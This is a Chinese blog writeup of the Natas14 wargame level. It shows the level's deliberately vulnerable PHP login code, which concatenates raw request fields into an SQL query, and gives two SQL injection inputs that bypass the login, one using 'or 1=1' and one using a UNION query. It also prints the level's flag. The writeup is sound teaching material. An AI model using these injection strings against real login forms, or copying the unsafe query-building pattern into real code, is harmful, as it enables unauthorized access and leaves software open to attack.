Mar 06 2020

Natas14 Writeup(sql注入、sql万能密码)

作者: 绝缘体..   发布: 2020-03-06 22:08   分类: 未分类   阅读:   抢沙发  
 
更多

Natas14:

是一个登录页面。源码如下。

if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);
    
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
    }
    mysql_close($link);
}
查看源码后发现是一个无过滤的sql注入题。
方法一:使用万能密码登录即可。
Username:admin" or 1=1 #
Password没做空值校验,随便输入或不输入皆可。

 

flag:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

方法二:使用联合查询也可。

Username: 1
Password: 1 " union select * from users where ""="

 

打赏

本文固定链接: https://www.cxy163.net/archives/5030 | 绝缘体

该日志由 绝缘体.. 于 2020年03月06日 发表在 未分类 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Natas14 Writeup(sql注入、sql万能密码) | 绝缘体
关键字: , , , ,
【上一篇】
【下一篇】

您可能还会对这些文章感兴趣!

  1. 身份认证种类及攻击
  2. sqlmap Tamper脚本编写
  3. mysql中int(1)是长度为1的int型吗?
  4. php的password_hash方法详解
  5. 使用php编程的一些经验总结
  6. mysql 配置ssl ,java应用连接
  7. 蜜罐学习
  8. MariaDB/MySQL配置文件my.cnf解读
  9. utf8和utf8mb4的区别
  10. MySQL的语句执行顺序
  11. Cookie 登陆报错解决办法
  12. SQL中的Error Code: 1215 Cannot add forei
  13. Node.js高并发服务性能优化实战:从事件循环到集
  14. MySQL Percona XtraDB Cluster(PXC)
  15. CentOS下安装MariaDB
  16. Python 模拟京东登录

Natas14 Writeup(sql注入、sql万能密码):等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter